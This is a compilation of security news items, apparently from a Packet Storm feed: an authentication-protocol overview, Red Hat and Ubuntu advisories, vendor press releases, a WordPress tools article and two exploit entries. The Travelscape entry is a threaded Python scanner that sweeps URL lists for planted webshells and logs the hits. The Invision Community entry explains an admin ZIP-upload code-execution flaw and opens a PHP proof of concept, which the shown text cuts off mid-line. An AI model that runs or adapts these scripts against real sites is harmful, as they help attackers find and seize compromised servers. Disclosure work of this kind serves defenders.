Prioritizing security and user experience will help you build a robust and reliable authentication system for your business.

Source: Tomasz Zajda via Alamy Stock Photo

Authentication protocols serve as the backbone of online security, enabling users to confirm their identities securely and access protected information and services. They define how claimants (users trying to access a digital service) and verifiers (the entities authenticating them) communicate. The protocols exchange information to verify the validity of the authentication service and confirm that the claimant possesses the appropriate token to authenticate their identity.

With myriad authentication protocols available, however, selecting the appropriate one for your organization can be daunting. Following are the key authentication protocols, along with insights into choosing the right one for your business needs.

Each authentication protocol offers unique features tailored to specific use cases and security requirements. If you're trying to figure out which one is best for your business, consider these four authentication protocols and their potential use cases.

OAuth/OpenID Connect (OIDC): OAuth, primarily designed for authorization, allows users to grant third-party applications limited access to their private resources without revealing their credentials. You might consider using OAuth from providers such as Google and GitHub to prioritize quick user registrations while getting validated information.

OpenID Connect (OIDC) is an open standard that builds on OAuth by providing authentication capabilities using an ID token to verify user identity securely. OIDC suits scenarios in which interoperability and user authentication across multiple systems are crucial, such as in federated identity management systems.

Both OAuth and OpenID Connect are widely adopted, allowing for interoperability between different systems, and they let users authenticate once to use the same credentials across multiple services. OAuth and OpenID Connect are, however, susceptible to phishing attacks and token theft if not implemented securely.

Security Assertion Markup Language (SAML): SAML is an XML-based standard for exchanging identity information between the user, the identity provider (IdP), and the service provider (SP). SAML offloads authentication responsibilities to specialized IdPs, reducing the burden on SPs and enhancing security. SAML works best for single sign-on (SSO) authentication in enterprise environments, where centralized authentication and access control are essential.

SAML supports use cases like identity federation, but SAML configurations can be complex and require careful management. SAML's reliance on XML may also introduce complexity owing to it being an older format than more modern ones, like JSON.

FIDO2/WebAuthn: FIDO2 is an open standard for passwordless authentication that relies on registered devices or hardware security keys to verify user identities. WebAuthn, a component of FIDO2, enables passwordless authentication through possession-based and biometric methods. You may want to consider WebAuthn for consumer-facing applications and mobile-first experiences, leveraging native device capabilities for seamless and secure authentication.

Passkeys, which are cross-device credentials based on the WebAuthn standards, have been implemented in several large organizations like Google, Apple, Shopify, Best Buy, TikTok, and GitHub over the past few years. Success stories from early adopters and increased awareness among end users are sure to continue driving adoption in the years to come.

FIDO2 and WebAuthn provide strong security against phishing and other attacks — because they don't rely on shared secrets like passwords — and a user-friendly experience, because users don't need to remember complex passwords. That said, FIDO2 and WebAuthn aren't compatible with all devices and browsers; current support gaps might make these protocols cumbersome for some users.

Time-Based One-Time Password (TOTP): TOTP generates single-use passcodes based on a shared secret key and the current time, often providing an additional layer of security in multifactor authentication (MFA) setups. TOTP supports both hardware tokens and software-based authenticator applications. You should consider TOTP for various authentication scenarios that require enhanced security.

TOTP provides an additional layer of security beyond a password, as the code changes frequently and is tied to the specific device generating it. TOTP does, however, require the user to have a separate device to generate the codes, and it doesn't protect against phishing if the user is tricked into handing the code over to the attacker.

**Factors in Selecting an Authentication Protocol**

It's easy to generalize which of the above four protocols you should use. Business applications targeting enterprises should use SAML because of its robust SSO capabilities and centralized authentication management. Consumer and mobile applications should pick WebAuthn/passkeys to provide a seamless and secure authentication experience that leverages native device features, like biometrics.

That said, each business has unique requirements, and it's not always best to generalize. Here are some factors to keep in mind when choosing an authentication protocol:

1.  Security levels: Prioritize protocols that offer robust security measures to safeguard user data and prevent unauthorized access.
    
2.  Integration: Choose protocols that seamlessly integrate with your existing infrastructure to streamline implementation and maintenance processes.
    
3.  Scalability: Ensure that the selected protocol can accommodate your organization's growth and an increasing user base without compromising performance or security.
    
4.  Authentication method: Consider the authentication methods your users prefer and select protocols that align with their expectations and UX preferences.
    

Choosing the right authentication protocol is critical for maintaining the security and trust of your users. By understanding the features and use cases of different protocols and considering factors such as security, integration, scalability, and user experience, you can select the most suitable protocol for your organization's needs.

**About the Author(s)**

Meir Wahnon is a co-founder at Descope, a drag-and-drop customer authentication and identity management platform. Before Descope, Meir served as senior director of engineering at Palo Alto Networks after the acquisition of Demisto, where he was part of the founding team. Meir is passionate about open source, no-code / low-code platforms, and ML. In his spare time, Meir likes to try out new Michelin-star restaurants around the world.

Selecting the Right Authentication Protocol for Your Business

Red Hat Security Advisory 2024-1750-03 - An update for unbound is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1750.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:1750-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1750Issue date:         2024-04-10Revision:           03CVE Names:          CVE-2024-1488====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver.Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions,allowing any process outside the unbound group to modify the unbound runtimeconfiguration. The default combination of the \"control-use-cert: no\" option witheither explicit or implicit use of an IP address in the \"control-interface\"option could allow improper access. If a process can connect over localhost toport 8953, it can alter the configuration of unbound.service. This flaw allowsan unprivileged local process to manipulate a running instance, potentiallyaltering forwarders, allowing them to track all queries forwarded by the localresolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file\"/etc/unbound/conf.d/remote-control.conf\" has been added and included in themain unbound configuration file, \"unbound.conf\". The file contains twodirectives that should limit access to unbound.conf:    control-interface: \"/run/unbound/control\"    control-use-cert: \"yes\"For details about these directives, run \"man unbound.conf\".Updating to the version of unbound provided by this advisory should, in mostcases, address the vulnerability. To verify that your configuration is notvulnerable, use the \"unbound-control status | grep control\" command. If theoutput contains \"control(ssl)\" or \"control(namedpipe)\", your configuration isnot vulnerable. If the command output returns only \"control\", the configurationis vulnerable because it does not enforce access only to the unbound groupmembers. To fix your configuration, add the line \"include:/etc/unbound/conf.d/remote-control.conf\" to the end of the file\"/etc/unbound/unbound.conf\". If you use a custom\"/etc/unbound/conf.d/remote-control.conf\" file, add the new directives to thisfile. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1488References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2264183

Red Hat Security Advisory 2024-1750-03

By cybernewswire
Tel Aviv, Israel, April 10th, 2024, CyberNewsWire Cyber GRC software company Cypago has announced a new automation solution…
This is a post from HackRead.com Read the original post: Cypago Announces New Automation Support for AI Security and Governance

**Tel Aviv, Israel, April 10th, 2024, CyberNewsWire**

Cyber GRC software company Cypago has announced a new automation solution for artificial intelligence (AI) governance, risk management and compliance. This includes implementation of NIST AI RMF and ISO/IEC 42001, the newest AI security and governance frameworks. With more and more companies integrating new AI tools into their business processes, daily operations, and customer-facing products and services, safe and compliant use of AI has become a pivotal challenge.

Enterprises are adopting AI-powered tools and solutions at a staggering pace, thanks to the increasing power and democratization of AI platforms, and the extensive benefits that artificial intelligence can bring to business operations. However, AI also brings many dangers, including the potential for leaking private data, lack of transparency, and increasingly complex cyber threats. Organizations also need to prepare themselves for more legislation regulating the use and application of AI in business settings. 

The best way to protect against these dangers and stay ahead of AI regulations is through adherence to best practices for cyber GRC governance, which are in a constant state of flux. By providing comprehensive risk management, automated 24/7 monitoring, and cybersecurity governance tailored to AI solutions, Cypago enables companies to seamlessly secure their AI initiatives. 

“The world of AI is changing quickly, with new threats arising all the time and new regulations arriving frequently. We view it as our responsibility to help organizations maximize the benefits of AI while effectively mitigating the risks and ensuring compliance with best practices and good governance,” said Arik Solomon, CEO of Cypago. “These latest features ensure that Cypago supports the newest AI and cyber governance frameworks, enabling GRC and cybersecurity teams to automate GRC with the most up-to-date requirements.” 

Cypago delivers ongoing visibility into all the organization’s tools, applications, and models, while automating many processes needed for effective risk assessment and threat detection. Its heightened security measures for AI-based systems help keep data and software secure, reducing the risk of cyber threats, data breaches and regulatory violations. 

What’s more, Cypago is no stranger to the implementation of safe AI, having adopted natural language models and generative AI command prompts as part of its product in 2023.

The platform streamlines security, risk management and compliance gap detection and remediation processes, enabling teams to respond more effectively to emerging threats and vulnerabilities, while ensuring compliance with international, national, and industry-specific regulations. This empowers companies to navigate the complex compliance landscape, which now encompasses the use of AI, with confidence. 

**About Cypago**

Cypago’s revolutionary SaaS-based Cyber GRC Automation (CGA) platform redefines the three lines model by eliminating friction and bridging the gap between management, security, and operations. It transforms GRC initiatives into automated processes, enabling in-depth visibility, streamlining enforcement, and significantly reducing overall costs. The platform leverages innovative technologies, including advanced analysis and correlation engines, GenAI, and NLP models, designed to support any security framework in any IT environment, both in the cloud and on-premises. Cypago was founded in 2020 by tech leaders and cybersecurity veterans with decades of combined experience in the development, operations, and commercialization of cybersecurity solutions. For more information, visit https://cypago.com/. 

**Contact**

**PR**  
**Dan Edelstein**  
**InboundJunction**  
**\[email protected\]**

Cypago Announces New Automation Support for AI Security and Governance

By Owais Sultan
WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small…
This is a post from HackRead.com Read the original post: The Essential Tools and Plugins for WordPress Development

WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small software components effortlessly improve the functionality of your website. Having the right resources and tools is crucial for developers venturing into WordPress development services. Let’s explore the essential elements that can facilitate and enhance your journey in this field.

****Essential Tools for WordPress Development****

WordPress powers millions of websites worldwide (472 million), from personal blogs to enterprise-level e-commerce platforms. Developers face challenges in such a diverse ecosystem, from writing clean and efficient code to ensuring seamless website deployment and maintenance. The right tools act as enablers, empowering developers to navigate these challenges easily and precisely.

****Code Editors****

Choosing a suitable code editor is akin to selecting the right brush for an artist. Versatile editors like Visual Studio Code or Sublime Text provide many features such as syntax highlighting, auto-completion, and Git integration. These features enhance productivity and foster a conducive environment for writing clean, maintainable code.

****Local Development Environments****

Developing and testing WordPress websites on a live server can be risky and inefficient. Local development environments, facilitated by tools like XAMPP, MAMP, or Docker, provide a safe and controlled environment for experimentation and iteration. Developers can test new features, plugins, and themes without fearing disrupting the live website, ensuring a seamless user experience upon deployment.

****Version Control Systems****

Version control systems like Git are the backbone of efficient teamwork in a collaborative development environment. Paired with platforms like GitHub or Bitbucket, these systems enable developers to manage code changes seamlessly, collaborate with team members in real time, and maintain a comprehensive project history. This fosters a cohesive and organized development environment, ensuring everyone is on the same page throughout the development lifecycle.

****Debugging Tools****

No code is perfect, and debugging is inevitable in the development process. Specialized debugging tools like Query Monitor or Debug Bar provide developers with invaluable insights into the inner workings of their WordPress projects. These tools are indispensable for maintaining a robust and efficient website, from identifying and troubleshooting issues to monitoring performance and optimizing the codebase.

****Must-Have Plugins for WordPress Development****

WordPress’s flexibility and extensibility are key factors contributing to its popularity among developers worldwide. However, the sheer volume of available plugins can be overwhelming, making it essential for developers to discern and integrate the most suitable ones into their projects. Here’s why selecting the right plugins is imperative for effective WordPress development:

****SEO Plugins****

Optimizing websites for search engines is essential for driving organic traffic and enhancing visibility. SEO plugins like Yoast SEO or Rank Math provide developers with robust tools to optimize their WordPress sites effectively. Features such as XML sitemap generation, meta tag optimization, and comprehensive content analysis empower developers to bolster their site’s visibility and relevance in search engine results, increasing organic traffic and user engagement.

****Performance Optimization Plugins****

User experience is paramount in retaining visitors and fostering engagement on WordPress websites. Performance optimization plugins such as WP Rocket or W3 Total Cache offer many optimization features to improve site speed and performance. From caching mechanisms to asset minification and lazy loading, these plugins ensure a snappier and more responsive user experience, leading to higher user satisfaction and retention.

****Security Plugins****

Protecting WordPress websites against security threats is a top priority for developers. Security plugins like Wordfence or Sucuri Security fortify the site’s defences with features such as firewall protection, malware scanning, and enhanced login security. By implementing these plugins, developers can ensure peace of mind against potential threats and vulnerabilities, safeguarding their websites and user data from malicious attacks.

****Development & Debugging Plugins****

Efficient development workflows are essential for maintaining productivity and delivering high-quality WordPress projects. Development and debugging plugins such as Query Monitor or Debug Bar streamline debugging and optimization by providing critical insights into database queries, PHP errors, and HTTP requests. By leveraging these plugins, developers can identify and address issues swiftly, ensuring the seamless operation of WordPress projects and minimizing development time.

****Elevate Your WordPress Development Experience****

Integrating these indispensable tools and plugins into your WordPress development arsenal empowers you to transcend boundaries, streamline processes, and unlock the full potential of your projects. By staying abreast of the latest advancements in the WordPress ecosystem, you can continually refine and optimize your development practices, fostering innovation and excellence in your endeavours.

1.  What To Look For In The Best WordPress Hosting
2.  What is WooCommerce, and Why You Should Care
3.  Kotlin app development company – How to choose
4.  Tips for Using Uploader Widgets on WordPress Blogs
5.  MySQL Performance Tuning: 5 Tips for Blazing Fast Queries

The Essential Tools and Plugins for WordPress Development

It was discovered that a race condition existed in the io_uring subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Lonial Con discovered that the netfilter subsystem in the Linux kernel contained a memory leak when handling certain element flush operations. A local attacker could use this to expose sensitive information (kernel memory). Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 ESM  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

It was discovered that a race condition existed in the io_uring  
subsystem in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1872)

Lonial Con discovered that the netfilter subsystem in the Linux kernel  
contained a memory leak when handling certain element flush operations.  
A local attacker could use this to expose sensitive information (kernel  
memory). (CVE-2023-4569)

It was discovered that the TLS subsystem in the Linux kernel did not  
properly perform cryptographic operations in some situations, leading to  
a null pointer dereference vulnerability. A local attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-6176)

It was discovered that a race condition existed in the AppleTalk  
networking subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-51781)

Jann Horn discovered that the TLS subsystem in the Linux kernel did not  
properly handle spliced messages, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2024-0646)

Notselwyn discovered that the netfilter subsystem in the Linux kernel  
did not properly handle verdict parameters in certain cases, leading to  
a use- after-free vulnerability. A local attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2024-1086)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    gke - 102.1  
    gkeop - 102.1  
    ibm - 102.1  
    lowlatency - 102.1

Ubuntu 18.04 LTS  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    lowlatency - 102.1

Ubuntu 16.04 ESM  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    lowlatency - 102.1

Ubuntu 22.04 LTS  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    gke - 102.1  
    ibm - 102.1  
    lowlatency - 102.1

Ubuntu 14.04 ESM  
    generic - 102.1  
    lowlatency - 102.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-1872  
-   CVE-2023-4569  
-   CVE-2023-6176  
-   CVE-2023-51781  
-   CVE-2024-0646  
-   CVE-2024-1086

Kernel Live Patch Security Notice LSN-0102-1

Red Hat Security Advisory 2024-1706-03 - An update for Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available. Red Hat Product Security has rated this update as having a security impact of Important. The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products. Issues addressed include denial of service and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1706.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available (updates to RHBQ 3.2.11)  
Advisory ID:        RHSA-2024:1706-03  
Product:            Red Hat Build of Apache Camel  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1706  
Issue date:         2024-04-09  
Revision:           03  
CVE Names:          CVE-2024-1023  
====================================================================

Summary: 

An update for Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available (updates to RHBQ 3.2.11).  
Red Hat Product Security has rated this update as having a security impact of  
Important.  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products

Description:

An update for Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available (updates to RHBQ 3.2.11).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:  
* TRIAGE CVE-2024-25710 commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file  
* TRIAGE CVE-2024-26308 commons-compress: OutOfMemoryError unpacking broken Pack200 file  
* TRIAGE CVE-2024-1300 vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support  
* TRIAGE CVE-2024-1023 vert.x: io.vertx/vertx-core: memory leak due to the use of Netty FastThreadLocal data structures in Vertx

Solution:

CVEs:

CVE-2024-1023

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-1706-03

PRESS RELEASE

DALLAS – April 9, 2024 – StrikeReady, the AI-pioneer advancing the way modern security teams operate, today announced $12 million in funding. The Series A round was led by 33N Ventures, with participation from Hitachi Ventures, Monta Vista Capital and industry luminaries Brian NeSmith, executive chairman and former CEO at Arctic Wolf; and Rod Beckstrom, former CEO of ICANN and Founding Director of U.S. National Cybersecurity Center (now CISA). 

StrikeReady is revolutionizing cybersecurity with its groundbreaking, vendor-neutral AI security operations platform. This one-of-a-kind solution seamlessly integrates with organizations existing security tools, unifying the entire tech stack. StrikeReady’s command center makes SOC teams more efficient and effective by uniting, centralizing and operationalizing security, fostering smarter, faster decision-making and proactive security defense.

SOC environments are complex and the tools traditionally used to manage security have proven ineffective and inefficient in bringing disparate technologies together and keeping companies ahead of threats. Further complicating the issue is the perpetual shortage of skilled security professionals, which hampers the ability to manage and respond to security incidents, leaving organizations vulnerable to cyber threats.

These challenges are driving the growth of StrikeReady, which is transforming the way modern security teams operate by reinventing how everything works together, while delivering a comprehensive, trustworthy view of security threats.

“Our security management platform up-levels and scales the capability of any SOC by making best-of-breed AI automation accessible and affordable for everyone,” Founder and CEO Yasir Khalid said. “The platform leverages AI to streamline and automate the routine and empower better, faster response to complex threats. Until now, our customers have referred to StrikeReady as a ‘well-kept secret’, but this funding will accelerate market awareness and growth.”

StrikeReady has secured Series A funding amidst challenging investment conditions, a testament to the sophistication of its AI solution and the pressing cybersecurity challenges it addresses. Despite turbulent times, StrikeReady’s innovative approach to how security teams work has garnered significant investor confidence, positioning the company as a leader in cybersecurity. StrikeReady intends to use its new funding to extend its product leadership in AI-based SOC technology, ramp its global go-to-market team, and continue scaling its infrastructure.

"StrikeReady is breaking the mold of conventional security solutions. We refuse to believe that security-centric companies should be confined to one platform. Instead, we champion the idea that teams should have the freedom to utilize the best-of-breed technology available,” said Carlos Moreira da Silva, co-founder and partner at 33N Ventures. “StrikeReady turns this belief into reality through its dedication to seamless integrations, ensuring compatibility with the diverse array of tools utilized by SOC teams today and tomorrow.”

“StrikeReady pioneers a groundbreaking AI-powered Security Command Center. Their hybrid model augments human intuition with cutting-edge AI and ML technologies. The mission: Streamlining tool sprawl, bridging the cybersecurity skills gap, all while placing humans – equipped with unparalleled guidance and automation – firmly at the helm of the cyber defense arsenal,” said Galina Sagan, Principal at Hitachi Ventures.

About StrikeReady:

Founded in 2019, StrikeReady is an AI pioneer in cybersecurity. StrikeReady introduces the first unified, vendor-agnostic, AI-powered security command center, purpose-built for modern SOC teams to optimize, centralize and accelerate a company’s threat response.

StrikeReady remains at the forefront of advancing beyond traditional AI and large language model (LLM) to a proprietary large action model (LAM), which takes actions across the technology stack based on a user’s prompts. The company’s forward-thinking AI technology has earned several external accolades, including validation from Gartner, which called the company out as the only Virtual Security Assistant in its Gartner Emerging Technologies: Tech Innovators in Advanced Virtual Assistants report.

The platform’s user-centric approach uplevels the entire security team into a proactive AI-powered cyber task force by dynamically centralizing, informing and advising security teams with a smarter, holistic and actionable defense against an ever-evolving threat landscape.

StrikeReady helps companies simultaneously reduce cyber threats and overcome the cyber talent deficit. For CISOs and security leaders who want more information on StrikeReady’s unified AI-powered security platform:

 Request a demo or Learn more.

About 33N:

33N is a specialized cybersecurity and infrastructure software European venture capital fund investing globally in €1-€10M ARR companies. 33N is made up of an experienced and established international team investing in the space for the last 10 years. The fund is supported by a strong Strategic Committee and Advisory Board encompassing +40 top entrepreneurs, experts and decision-makers spread worldwide and across the industry. Find more about 33N at https://33n.vc

StrikeReady Raises $12M for AI Security Command Platform

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

Invision Community versions 4.7.16 and below suffer from a remote code execution vulnerability in toolbar.php.

    ------------------------------------------------------------------------------Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability------------------------------------------------------------------------------[-] Software Link:https://invisioncommunity.com[-] Affected Versions:Version 4.7.16 and prior versions.[-] Vulnerability Description:The vulnerability is located in the/applications/core/modules/admin/editor/toolbar.php script.Specifically, into theIPS\core\modules\admin\editor\_toolbar::addPlugin() method, which willhandlethe upload of a ZIP file, trying to extract its content into the/applications/core/interface/ckeditor/ckeditor/plugins/ directory; ifthe ZIP archive does not includea plugin.js file, then the extracted ZIP content will be recursivelydeleted from the file system,otherwise it will stay there. This can be exploited to executearbitrary PHP code by uploading aZIP archive containing a plugin.js file (which can also be empty)along with a PHP file. Successfulexploitation of this vulnerability requires an Administrator accounthaving the "toolbar_manage" permission.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2024-30162.php[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed[20/03/2024] - CVE identifier requested[24/03/2024] - CVE identifier assigned[05/04/2024] - Coordinated public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2024-30162 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Other References:https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/[-] Original Advisory:http://karmainsecurity.com/KIS-2024-03-----------------------PoC:<?php/*    ------------------------------------------------------------------------------    Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability    ------------------------------------------------------------------------------    author..............: Egidio Romano aka EgiX    mail................: n0b0d13s[at]gmail[dot]com    software link.......: https://invisioncommunity.com    +-------------------------------------------------------------------------+    | This proof of concept code was written for educational purpose only.    |    | Use it at your own risk. Author will be not responsible for any damage. |    +-------------------------------------------------------------------------+    [-] Vulnerability Description:    The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.    Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will    handle the upload of a ZIP file, trying to extract its content into the    /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does    not include a plugin.js file, then the extracted ZIP content will be recursively deleted    from the file system, otherwise it will stay there. This can be exploited to execute    arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can    also be empty) along with a PHP file. Successful exploitation of this vulnerability    requires an Administrator account having the "toolbar_manage" permission.    [-] Original Advisory:    https://karmainsecurity.com/KIS-2024-03*/set_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[-] cURL extension required!\n");if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");$url = $argv[1];$email = $argv[2];$passwd = $argv[3];$ch = 